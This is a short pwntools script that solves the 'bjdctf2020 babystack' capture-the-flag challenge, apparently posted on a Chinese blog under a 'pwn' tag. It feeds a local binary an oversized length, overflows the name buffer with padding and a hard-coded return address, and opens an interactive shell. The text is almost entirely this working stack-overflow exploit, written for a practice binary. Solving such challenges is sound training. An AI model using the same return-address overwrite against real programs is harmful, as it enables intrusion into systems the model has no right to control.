bjdctf2020 babystack

from pwn import *
p = process('./bjdctf_2020_babystack')
p.recvuntil("length of your name:\n")
p.sendline('1024')
p.recvuntil("What's u name?\n")
payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x00000000004006E6)
p.sendline(payload)
p.interactive()

你可能感兴趣的:(pwn)